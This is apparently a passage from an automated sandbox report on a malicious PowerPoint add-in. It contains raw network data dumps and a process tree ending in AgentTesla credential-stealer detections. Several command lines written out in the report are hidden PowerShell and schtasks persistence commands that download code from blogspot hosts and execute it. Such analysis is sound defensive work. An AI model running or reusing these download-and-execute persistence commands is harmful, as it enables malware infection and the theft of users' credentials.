                                                                                                                                                                      2022-01-14 11:21:19 UTC1347INData Raw: 2c 33 39 2c 31 32 36 2c 31 35 30 2c 35 36 2c 34 37 2c 34 2c 31 32 35 2c 32 33 33 2c 35 32 2c 37 37 2c 32 33 37 2c 32 31 2c 31 32 32 2c 32 34 2c 32 35 33 2c 31 35 36 2c 30 2c 34 37 2c 35 36 2c 32 34 31 2c 32 33 31 2c 32 32 38 2c 34 35 2c 32 36 2c 31 36 35 2c 35 36 2c 31 34 38 2c 35 37 2c 37 31 2c 31 37 31 2c 38 31 2c 32 32 2c 31 30 33 2c 31 30 33 2c 32 35 34 2c 32 34 34 2c 32 34 33 2c 31 31 37 2c 32 33 38 2c 31 36 31 2c 32 30 34 2c 31 31 2c 31 33 2c 31 31 35 2c 31 39 30 2c 31 36 38 2c 34 34 2c 31 31 2c 37 37 2c 31 31 32 2c 33 30 2c 36 39 2c 32 33 31 2c 31 38 32 2c 31 33 33 2c 32 34 33 2c 31 32 30 2c 31 39 35 2c 32 35 34 2c 32 30 38 2c 32 31 34 2c 32 30 36 2c 32 31 31 2c 31 32 2c 31 35 39 2c 34 2c 31 31 39 2c 31 36 35 2c 31 34 30 2c 34 31 2c 32 33 36 2c 31
                                                                                                                                                                      Data Ascii: ,39,126,150,56,47,4,125,233,52,77,237,21,122,24,253,156,0,47,56,241,231,228,45,26,165,56,148,57,71,171,81,22,103,103,254,244,243,117,238,161,204,11,13,115,190,168,44,11,77,112,30,69,231,182,133,243,120,195,254,208,214,206,211,12,159,4,119,165,140,41,236,1
                                                                                                                                                                      2022-01-14 11:21:19 UTC1363INData Raw: 32 32 30 2c 31 31 34 2c 31 33 31 2c 31 30 2c 32 32 30 2c 31 37 35 2c 39 39 2c 37 34 2c 33 38 2c 31 36 35 2c 31 39 31 2c 31 38 30 2c 31 34 36 2c 37 35 2c 31 33 2c 39 35 2c 36 35 2c 31 34 35 2c 32 35 34 2c 33 34 2c 32 30 2c 36 39 2c 36 33 2c 31 31 38 2c 32 30 33 2c 31 2c 31 31 37 2c 31 2c 31 32 33 2c 31 30 39 2c 37 34 2c 31 33 2c 31 36 39 2c 35 32 2c 32 35 32 2c 31 32 36 2c 38 37 2c 32 39 2c 31 33 31 2c 31 30 33 2c 31 31 37 2c 39 32 2c 32 30 35 2c 31 37 31 2c 31 37 2c 35 33 2c 31 35 30 2c 34 31 2c 31 34 39 2c 33 31 2c 35 39 2c 31 36 30 2c 32 30 34 2c 31 32 32 2c 36 32 2c 31 35 30 2c 32 30 31 2c 31 38 36 2c 32 35 33 2c 34 31 2c 31 36 38 2c 32 32 31 2c 31 38 2c 35 34 2c 31 33 36 2c 38 34 2c 36 32 2c 34 35 2c 32 33 34 2c 36 39 2c 31 38 33 2c 35 31 2c 32 32 37
                                                                                                                                                                      Data Ascii: 220,114,131,10,220,175,99,74,38,165,191,180,146,75,13,95,65,145,254,34,20,69,63,118,203,1,117,1,123,109,74,13,169,52,252,126,87,29,131,103,117,92,205,171,17,53,150,41,149,31,59,160,204,122,62,150,201,186,253,41,168,221,18,54,136,84,62,45,234,69,183,51,227
                                                                                                                                                                      2022-01-14 11:21:19 UTC1379INData Raw: 32 32 2c 31 34 30 2c 31 39 36 2c 35 36 2c 32 32 35 2c 33 36 2c 39 37 2c 31 33 30 2c 34 38 2c 37 33 2c 31 35 32 2c 31 34 36 2c 31 39 33 2c 31 36 31 2c 31 39 37 2c 38 33 2c 33 36 2c 31 36 36 2c 39 2c 35 31 2c 31 33 32 2c 38 39 2c 31 38 35 2c 31 33 33 2c 33 36 2c 31 35 38 2c 33 38 2c 31 31 33 2c 31 33 34 2c 31 31 32 2c 31 35 30 2c 31 31 32 2c 31 34 32 2c 31 31 32 2c 31 35 38 2c 32 30 38 2c 37 37 2c 35 36 2c 36 34 2c 35 36 2c 34 30 2c 33 35 2c 31 39 36 2c 31 32 34 2c 33 31 2c 33 34 2c 32 30 39 2c 36 37 2c 32 33 32 2c 33 37 2c 32 38 2c 31 35 30 2c 36 35 2c 31 39 2c 31 34 32 2c 31 38 2c 32 35 30 2c 38 2c 32 30 31 2c 33 2c 32 33 36 2c 31 37 2c 33 33 2c 36 39 2c 37 32 2c 31 39 2c 39 32 2c 31 39 34 2c 36 30 2c 33 36 2c 31 32 36 2c 37 38 2c 38 2c 31 39 34 2c 32 2c
                                                                                                                                                                      Data Ascii: 22,140,196,56,225,36,97,130,48,73,152,146,193,161,197,83,36,166,9,51,132,89,185,133,36,158,38,113,134,112,150,112,142,112,158,208,77,56,64,56,40,35,196,124,31,34,209,67,232,37,28,150,65,19,142,18,250,8,201,3,236,17,33,69,72,19,92,194,60,36,126,78,8,194,2,
                                                                                                                                                                      2022-01-14 11:21:19 UTC1395INData Raw: 38 2c 31 33 31 2c 37 32 2c 38 36 2c 31 36 2c 31 34 33 2c 38 36 2c 31 35 38 2c 31 39 39 2c 31 38 31 2c 39 2c 31 36 35 2c 31 35 34 2c 32 33 32 2c 31 39 37 2c 31 39 36 2c 31 36 34 2c 31 33 38 2c 32 34 35 2c 31 35 33 2c 32 32 2c 32 31 2c 31 31 30 2c 31 33 38 2c 35 37 2c 38 32 2c 31 37 38 2c 32 30 31 2c 31 38 33 2c 31 33 39 2c 31 36 36 2c 31 33 36 2c 31 30 39 2c 31 33 39 2c 32 30 39 2c 32 34 33 2c 34 38 2c 31 30 37 2c 39 38 2c 31 33 2c 38 39 2c 34 32 2c 31 35 39 2c 38 38 2c 31 38 37 2c 31 37 33 2c 37 37 2c 31 30 38 2c 32 31 39 2c 31 34 35 2c 31 39 33 2c 31 34 30 2c 32 2c 32 35 33 2c 32 33 36 2c 31 32 36 2c 32 30 38 2c 31 36 36 2c 31 38 30 2c 32 30 38 2c 38 38 2c 31 37 37 2c 32 39 2c 32 31 33 2c 32 31 32 2c 32 30 2c 31 33 39 2c 35 37 2c 32 33 37 2c 31 37 37 2c
                                                                                                                                                                      Data Ascii: 8,131,72,86,16,143,86,158,199,181,9,165,154,232,197,196,164,138,245,153,22,21,110,138,57,82,178,201,183,139,166,136,109,139,209,243,48,107,98,13,89,42,159,88,187,173,77,108,219,145,193,140,2,253,236,126,208,166,180,208,88,177,29,213,212,20,139,57,237,177,
                                                                                                                                                                      2022-01-14 11:21:19 UTC1411INData Raw: 30 2c 31 32 37 2c 37 34 2c 32 34 38 2c 31 38 38 2c 38 39 2c 31 33 35 2c 31 35 30 2c 31 32 2c 31 32 36 2c 33 31 2c 31 38 30 2c 34 30 2c 35 30 2c 31 31 36 2c 32 30 31 2c 32 34 30 2c 32 32 34 2c 32 34 36 2c 31 32 32 2c 32 30 2c 32 33 38 2c 35 37 2c 32 31 34 2c 39 2c 32 31 31 2c 39 34 2c 31 39 38 2c 31 34 30 2c 32 31 33 2c 32 32 37 2c 38 33 2c 32 33 38 2c 32 35 35 2c 32 30 30 2c 31 35 32 2c 31 38 31 2c 39 32 2c 37 36 2c 31 36 32 2c 31 34 30 2c 31 35 38 2c 33 37 2c 31 32 36 2c 35 37 2c 32 34 35 2c 38 31 2c 31 31 34 2c 32 32 35 2c 32 34 35 2c 31 37 39 2c 39 31 2c 32 33 30 2c 31 31 31 2c 31 30 37 2c 31 35 33 2c 32 33 37 2c 31 37 39 2c 32 31 36 2c 35 36 2c 31 33 35 2c 37 31 2c 31 34 39 2c 32 30 35 2c 32 35 35 2c 36 2c 38 35 2c 31 39 30 2c 31 39 31 2c 33 34 2c 33
                                                                                                                                                                      Data Ascii: 0,127,74,248,188,89,135,150,12,126,31,180,40,50,116,201,240,224,246,122,20,238,57,214,9,211,94,198,140,213,227,83,238,255,200,152,181,92,76,162,140,158,37,126,57,245,81,114,225,245,179,91,230,111,107,153,237,179,216,56,135,71,149,205,255,6,85,190,191,34,3
                                                                                                                                                                      2022-01-14 11:21:19 UTC1427INData Raw: 2c 38 2c 32 31 31 2c 31 38 34 2c 31 31 33 2c 31 31 30 2c 31 39 36 2c 39 33 2c 31 33 36 2c 39 33 2c 32 32 34 2c 32 32 34 2c 32 31 36 2c 34 36 2c 31 38 38 2c 31 31 34 2c 31 33 32 2c 31 39 2c 38 2c 32 30 37 2c 34 2c 32 33 37 2c 32 30 2c 39 33 2c 31 33 33 2c 31 30 35 2c 32 32 37 2c 32 34 34 2c 31 36 33 2c 32 35 31 2c 31 30 36 2c 31 33 32 2c 31 30 37 2c 39 36 2c 33 35 2c 31 39 34 2c 37 34 2c 32 31 36 2c 31 34 32 2c 32 34 30 2c 34 34 2c 32 31 36 2c 31 34 31 2c 32 30 38 2c 31 2c 31 38 33 2c 33 34 2c 31 37 32 2c 31 33 30 2c 31 35 39 2c 31 39 38 2c 32 33 33 2c 37 31 2c 32 34 30 2c 31 38 33 2c 32 32 36 2c 31 31 36 2c 35 2c 31 36 37 2c 32 32 31 2c 31 31 2c 32 35 2c 37 31 2c 32 32 36 2c 31 33 38 2c 34 35 2c 31 31 33 2c 31 35 32 2c 36 34 2c 38 39 2c 36 33 2c 32 31 31
                                                                                                                                                                      Data Ascii: ,8,211,184,113,110,196,93,136,93,224,224,216,46,188,114,132,19,8,207,4,237,20,93,133,105,227,244,163,251,106,132,107,96,35,194,74,216,142,240,44,216,141,208,1,183,34,172,130,159,198,233,71,240,183,226,116,5,167,221,11,25,71,226,138,45,113,152,64,89,63,211
                                                                                                                                                                      2022-01-14 11:21:19 UTC1443INData Raw: 32 2c 35 36 2c 31 32 31 2c 32 31 37 2c 31 37 37 2c 31 35 37 2c 38 37 2c 34 35 2c 32 34 35 2c 32 32 30 2c 31 37 2c 35 32 2c 31 33 39 2c 31 39 31 2c 36 32 2c 32 32 35 2c 32 35 34 2c 32 30 35 2c 32 32 35 2c 36 37 2c 39 35 2c 32 34 38 2c 31 38 33 2c 31 35 39 2c 31 38 33 2c 39 35 2c 32 31 36 2c 32 35 34 2c 32 30 35 2c 39 39 2c 32 32 35 2c 31 39 39 2c 31 39 30 2c 31 31 37 2c 32 34 38 2c 32 33 32 2c 31 35 38 2c 32 31 39 2c 32 30 32 2c 36 33 2c 35 36 2c 32 34 33 2c 32 32 34 2c 31 31 31 2c 32 34 36 2c 35 37 2c 32 32 32 2c 31 32 31 2c 39 34 2c 38 37 2c 32 35 30 2c 31 35 2c 39 30 2c 32 31 35 2c 31 31 35 2c 32 30 37 2c 31 39 31 2c 32 34 34 2c 32 33 35 2c 39 31 2c 31 32 36 2c 32 34 36 2c 32 35 30 2c 32 35 31 2c 32 33 2c 32 32 33 2c 31 38 39 2c 38 38 2c 32 36 2c 32 35
                                                                                                                                                                      Data Ascii: 2,56,121,217,177,157,87,45,245,220,17,52,139,191,62,225,254,205,225,67,95,248,183,159,183,95,216,254,205,99,225,199,190,117,248,232,158,219,202,63,56,243,224,111,246,57,222,121,94,87,250,15,90,215,115,207,191,244,235,91,126,246,250,251,23,223,189,88,26,25


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      Analysis Process: POWERPNT.EXE PID: 5140 Parent PID: 744

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:24
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding
                                                                                                                                                                      Imagebase:0x290000
                                                                                                                                                                      File size:1849008 bytes
                                                                                                                                                                      MD5 hash:68F52CD14C61DDC941769B55AE3F2EE9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: cmd.exe PID: 4964 Parent PID: 568

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:38
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam"
                                                                                                                                                                      Imagebase:0xd80000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: conhost.exe PID: 6448 Parent PID: 4964

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:39
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: POWERPNT.EXE PID: 5720 Parent PID: 4964

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:40
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou "
                                                                                                                                                                      Imagebase:0x290000
                                                                                                                                                                      File size:1849008 bytes
                                                                                                                                                                      MD5 hash:68F52CD14C61DDC941769B55AE3F2EE9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: powershell.exe PID: 6628 Parent PID: 5720

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:48
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1
                                                                                                                                                                      Imagebase:0xa50000
                                                                                                                                                                      File size:430592 bytes
                                                                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: conhost.exe PID: 6672 Parent PID: 6628

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:48
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: schtasks.exe PID: 6028 Parent PID: 6628

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:38
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: powershell.exe PID: 3660 Parent PID: 664

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:39
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff777fc0000
                                                                                                                                                                      File size:447488 bytes
                                                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: conhost.exe PID: 2924 Parent PID: 3660

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:39
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: powershell.exe PID: 6240 Parent PID: 3352

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:43
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff777fc0000
                                                                                                                                                                      File size:447488 bytes
                                                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: conhost.exe PID: 3860 Parent PID: 6240

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:44
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: powershell.exe PID: 1284 Parent PID: 3352

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:51
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff777fc0000
                                                                                                                                                                      File size:447488 bytes
                                                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: conhost.exe PID: 7088 Parent PID: 1284

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:52
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: aspnet_compiler.exe PID: 1200 Parent PID: 6628

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:10
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Imagebase:0x1d0000
                                                                                                                                                                      File size:36864 bytes
                                                                                                                                                                      MD5 hash:AE2C1DCC77B6ED0711330B075028D7B3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: aspnet_compiler.exe PID: 6068 Parent PID: 6628

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:11
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Imagebase:0xb40000
                                                                                                                                                                      File size:36864 bytes
                                                                                                                                                                      MD5 hash:AE2C1DCC77B6ED0711330B075028D7B3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: aspnet_compiler.exe PID: 5156 Parent PID: 6628

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:13
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Imagebase:0x630000
                                                                                                                                                                      File size:36864 bytes
                                                                                                                                                                      MD5 hash:AE2C1DCC77B6ED0711330B075028D7B3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: schtasks.exe PID: 6656 Parent PID: 6240

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:23
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff73f650000
                                                                                                                                                                      File size:226816 bytes
                                                                                                                                                                      MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Analysis Process: schtasks.exe PID: 6288 Parent PID: 1284

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:30
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff73f650000
                                                                                                                                                                      File size:226816 bytes
                                                                                                                                                                      MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Chronological Activities

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Analysis Process: aspnet_compiler.exe PID: 6068 Parent PID: 6628 aspnet_compiler.exeCOMMON

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:17.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:5.7%
                                                                                                                                                                        Total number of Nodes:122
                                                                                                                                                                        Total number of Limit Nodes:7

                                                                                                                                                                        Graph

